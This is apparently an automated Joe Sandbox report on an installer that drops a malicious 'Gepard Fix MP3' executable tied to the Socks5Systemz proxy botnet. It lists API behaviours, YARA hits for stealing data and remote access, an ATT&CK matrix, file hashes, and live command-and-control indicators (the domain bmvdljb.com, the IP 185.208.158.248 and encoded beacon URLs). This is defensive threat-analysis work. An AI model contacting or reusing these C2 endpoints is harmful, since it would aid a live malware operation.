        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe TID: 1548Thread sleep time: -6296000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00452A4C FindFirstFileA,GetLastError,1_2_00452A4C
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,1_2_004751F8
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464048
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004644C4
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,1_2_00462ABC
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00497A74
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeThread delayed: delay time: 60000Jump to behavior
        Source: gepardfixmp3_32.exe, 00000003.00000002.3385202089.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, gepardfixmp3_32.exe, 00000003.00000002.3387554380.0000000003578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\eCh9R4T214.exeAPI call chain: ExitProcess graph end nodegraph_0-6729
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeAPI call chain: ExitProcess graph end nodegraph_3-19555
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeAPI call chain: ExitProcess graph end nodegraph_3-20695
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C401CE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02C401CE
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C401CE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02C401CE
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502AC
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C2648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,3_2_02C2648B
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C39538 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02C39538
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00478420 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478420
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E0AC
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C2F85F cpuid 3_2_02C2F85F
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: GetLocaleInfoA,0_2_004051FC
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: GetLocaleInfoA,0_2_00405248
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: GetLocaleInfoA,1_2_00408570
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: GetLocaleInfoA,1_2_004085BC
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0045892C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_0045892C
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00455588 GetUserNameA,1_2_00455588
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3386708643.0000000002B7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: gepardfixmp3_32.exe PID: 4888, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3386708643.0000000002B7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: gepardfixmp3_32.exe PID: 4888, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
        Native API
        1
        DLL Side-Loading
        1
        Exploitation for Privilege Escalation
        1
        Deobfuscate/Decode Files or Information
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        2
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts2
        Service Execution
        4
        Windows Service
        1
        DLL Side-Loading
        2
        Obfuscated Files or Information
        LSASS Memory1
        Account Discovery
        Remote Desktop ProtocolData from Removable Media2
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Bootkit
        1
        Access Token Manipulation
        21
        Software Packing
        Security Account Manager2
        File and Directory Discovery
        SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook4
        Windows Service
        1
        Timestomp
        NTDS35
        System Information Discovery
        Distributed Component Object ModelInput Capture112
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
        Process Injection
        1
        DLL Side-Loading
        LSA Secrets141
        Security Software Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading
        Cached Domain Credentials1
        Process Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
        Virtualization/Sandbox Evasion
        DCSync21
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation
        Proc Filesystem11
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
        Process Injection
        /etc/passwd and /etc/shadow3
        System Owner/User Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Bootkit
        Network Sniffing1
        Remote System Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
        System Network Configuration Discovery
        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        eCh9R4T214.exe26%ReversingLabsWin32.Trojan.Munp
        eCh9R4T214.exe30%VirustotalBrowse
        eCh9R4T214.exe100%AviraHEUR/AGEN.1332570
        SourceDetectionScannerLabelLink
        C:\ProgramData\Epic Project Studio 10.4.46\Epic Project Studio 10.4.46.exe29%ReversingLabsWin32.Adware.Generic
        C:\ProgramData\Epic Project Studio 10.4.46\Epic Project Studio 10.4.46.exe35%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe29%ReversingLabsWin32.Adware.Generic
        C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe35%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-1P9P2.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-1P9P2.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-265R7.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-265R7.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-2DTNR.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-2DTNR.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-5TE1U.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-5TE1U.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-6TDVA.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-6TDVA.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-7DR0L.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-7DR0L.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-7GMIE.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-7GMIE.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-80S4I.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-80S4I.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-9D3SM.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-9D3SM.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-BCCM6.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-BCCM6.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-BPSO6.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-BPSO6.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-EVRO2.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-EVRO2.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-F27BV.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-F27BV.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-JJBLM.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-JJBLM.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-JUGCD.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-JUGCD.tmp1%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-K0336.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-K0336.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-K35BI.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-K35BI.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-LB9DM.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gepard Fix MP3\is-LB9DM.tmp0%VirustotalBrowse
        No Antivirus matches
        SourceDetectionScannerLabelLink
        18.31.95.13.in-addr.arpa0%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://www.innosetup.com/0%URL Reputationsafe
        http://www.remobjects.com/psU0%URL Reputationsafe
        http://www.remobjects.com/ps0%URL Reputationsafe
        http://tukaani.org/xz/0%VirustotalBrowse
        http://mingw-w64.sourceforge.net/X0%VirustotalBrowse
        http://tukaani.org/0%VirustotalBrowse
        http://185.208.158.248/1%VirustotalBrowse
        http://fsf.org/0%VirustotalBrowse
        http://www.gnu.org/licenses/0%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        bmvdljb.com
        185.208.158.248
        truetrue
          unknown
          18.31.95.13.in-addr.arpa
          unknown
          unknownfalseunknown
          NameMaliciousAntivirus DetectionReputation
          http://bmvdljb.com/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99ctrue
            unknown
            bmvdljb.comtrue
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://www.innosetup.com/eCh9R4T214.tmp, eCh9R4T214.tmp, 00000001.00000000.2136106475.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-R93BU.tmp.1.dr, eCh9R4T214.tmp.0.drfalse
              • URL Reputation: safe
              unknown
              http://tukaani.org/is-F27BV.tmp.1.drfalseunknown
              http://www.remobjects.com/psUeCh9R4T214.exe, 00000000.00000003.2135596677.0000000002320000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.exe, 00000000.00000003.2135731235.00000000020C4000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000000.2136106475.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-R93BU.tmp.1.dr, eCh9R4T214.tmp.0.drfalse
              • URL Reputation: safe
              unknown
              http://tukaani.org/xz/is-F27BV.tmp.1.drfalseunknown
              http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12egepardfixmp3_32.exe, 00000003.00000002.3385202089.0000000000A83000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://mingw-w64.sourceforge.net/Xis-2DTNR.tmp.1.drfalseunknown
                http://185.208.158.248/gepardfixmp3_32.exe, 00000003.00000002.3385202089.0000000000A9B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82dgepardfixmp3_32.exe, 00000003.00000002.3385202089.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, gepardfixmp3_32.exe, 00000003.00000002.3387962842.000000000363E000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://www.remobjects.com/pseCh9R4T214.exe, 00000000.00000003.2135596677.0000000002320000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.exe, 00000000.00000003.2135731235.00000000020C4000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, eCh9R4T214.tmp, 00000001.00000000.2136106475.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-R93BU.tmp.1.dr, eCh9R4T214.tmp.0.drfalse
                  • URL Reputation: safe
                  unknown
                  http://fsf.org/eCh9R4T214.exe, 00000000.00000003.2135215031.0000000002320000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.exe, 00000000.00000002.3385206007.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000002.3385807866.0000000002180000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2140409485.0000000000692000.00000004.00000020.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2140531016.0000000000692000.00000004.00000020.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2137750932.0000000002190000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2140249239.0000000000692000.00000004.00000020.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2138611948.0000000002188000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2137017763.0000000003110000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000002.3385225642.0000000000692000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://www.gnu.org/licenses/eCh9R4T214.exe, 00000000.00000003.2135215031.0000000002320000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.exe, 00000000.00000002.3385206007.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000002.3385807866.0000000002180000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2140409485.0000000000692000.00000004.00000020.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2140531016.0000000000692000.00000004.00000020.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2137750932.0000000002190000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2140249239.0000000000692000.00000004.00000020.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2138611948.0000000002188000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2137017763.0000000003110000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000002.3385225642.0000000000692000.00000004.00000020.00020000.00000000.sdmp, is-1P9P2.tmp.1.drfalseunknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  185.208.158.248
                  bmvdljb.comSwitzerland
                  34888SIMPLECARRER2ITtrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1526384
                  Start date and time:2024-10-05 14:44:15 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 22s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:eCh9R4T214.exe
                  renamed because original name is a hash value
                  Original Sample Name:faefae3ea2db457031eb3f72ab6fedf5.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@5/69@2/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 91%
                  • Number of executed functions: 170
                  • Number of non-executed functions: 256
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  08:45:43API Interceptor413297x Sleep call for process: gepardfixmp3_32.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.208.158.248noode.exeGet hashmaliciousSocks5SystemzBrowse
                    file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                      Xzm9fAfKhB.exeGet hashmaliciousSocks5SystemzBrowse
                        L9rm7AX4mp.exeGet hashmaliciousSocks5SystemzBrowse
                          noode.exeGet hashmaliciousSocks5SystemzBrowse
                            noode.exeGet hashmaliciousSocks5SystemzBrowse
                              file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                  SecuriteInfo.com.Trojan.Win32.Crypt.31282.17969.exeGet hashmaliciousSocks5SystemzBrowse
                                    SecuriteInfo.com.Gen.Heur.Munp.1.15479.6612.exeGet hashmaliciousSocks5SystemzBrowse
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      SIMPLECARRER2ITnoode.exeGet hashmaliciousSocks5SystemzBrowse
                                      • 185.208.158.248
                                      file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                      • 185.208.158.248
                                      https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                      • 185.208.158.9
                                      Xzm9fAfKhB.exeGet hashmaliciousSocks5SystemzBrowse
                                      • 185.208.158.248
                                      L9rm7AX4mp.exeGet hashmaliciousSocks5SystemzBrowse
                                      • 185.208.158.248
                                      noode.exeGet hashmaliciousSocks5SystemzBrowse
                                      • 185.208.158.248
                                      http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                      • 185.208.158.9
                                      noode.exeGet hashmaliciousSocks5SystemzBrowse
                                      • 185.208.158.248
                                      file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                      • 185.208.158.248
                                      file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                      • 185.208.158.248
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Local\Gepard Fix MP3\is-265R7.tmpnoode.exeGet hashmaliciousSocks5SystemzBrowse
                                        file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                          Xzm9fAfKhB.exeGet hashmaliciousSocks5SystemzBrowse
                                            L9rm7AX4mp.exeGet hashmaliciousSocks5SystemzBrowse
                                              noode.exeGet hashmaliciousSocks5SystemzBrowse
                                                C:\Users\user\AppData\Local\Gepard Fix MP3\is-1P9P2.tmpnoode.exeGet hashmaliciousSocks5SystemzBrowse
                                                  file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                    Xzm9fAfKhB.exeGet hashmaliciousSocks5SystemzBrowse
                                                      L9rm7AX4mp.exeGet hashmaliciousSocks5SystemzBrowse
                                                        noode.exeGet hashmaliciousSocks5SystemzBrowse
                                                          Process:C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2910208
                                                          Entropy (8bit):6.978332127448101
                                                          Encrypted:false
                                                          SSDEEP:49152:3OrdLWDoRV6/aOC5kRsTwwLsufiIeyLxGQ+Fm8J1JVKM28g:+xb4/aOC5kRsTwwHf1T+oCX28g
                                                          MD5:FBBCE7B2EF79BF1D1711CCA350EA2C5A
                                                          SHA1:6E0D9C1FD70BB1015A9570EF79792E4E32E0666A
                                                          SHA-256:CD8C4EC8D35FE5EB73857470996E69EBA82F52F642D11DF57A4317FFB2D9E824
                                                          SHA-512:0FCB24ED8F5F627CBABE18E63D283925A32DB102924F56120F7263703DD6D8DB1219E0F4D20076447EA32861522F3AB08D6010F75B6026F1A15673CB11411A4E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          • Antivirus: Virustotal, Detection: 35%, Browse
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....L..................".........8."......."...@...........................,.......-.......................................".......#..A............................................................................"..............................text.....".......".................`....rdata........".......".............@..@.data...8t....#..0....".............@....rsrc....B....#..B...&#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):2.0
                                                          Encrypted:false
                                                          SSDEEP:3:pL/lln:ZXn
                                                          MD5:54AD9A984E55C682A930A436EE9FCDB6
                                                          SHA1:36BF4DA93FF0F1152117F4E5BAD5CB4F12F51B0A
                                                          SHA-256:3E19C7187DBFAEF706404CDAF9A7DECF29FEB3BB1207F4D3877B512D06C07C23
                                                          SHA-512:896C1E5B8BED3D047C584205471B4A63CE4AC67C0AB2AD655DB6D73EF87C28BC1DCE24B56DCA56C4ECAFFA874DE972258123A237A2EA2D75489ED56B7121219A
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.5.g....
                                                          Process:C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):0.8112781244591328
                                                          Encrypted:false
                                                          SSDEEP:3:f:f
                                                          MD5:819D3480E0B3A1CE02300E4C9DB12D62
                                                          SHA1:4D0E20C858E5D9D4A2EBAEF1E839609CEA066E6E
                                                          SHA-256:9855CDA098DCAC49935C7CEA75D9960EF8FD001B8FAC4D21DB934116F50E33C0
                                                          SHA-512:E3ADB383AC7D19E1A1334E1A78A59825E0A3281D588B0D69354AB8CC85851E74661F7985E5CACCE0B011569DC429BAAF2879CE7B2E450FAA1EB8472F310DB8F6
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:X...
                                                          Process:C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):128
                                                          Entropy (8bit):2.9545817380615236
                                                          Encrypted:false
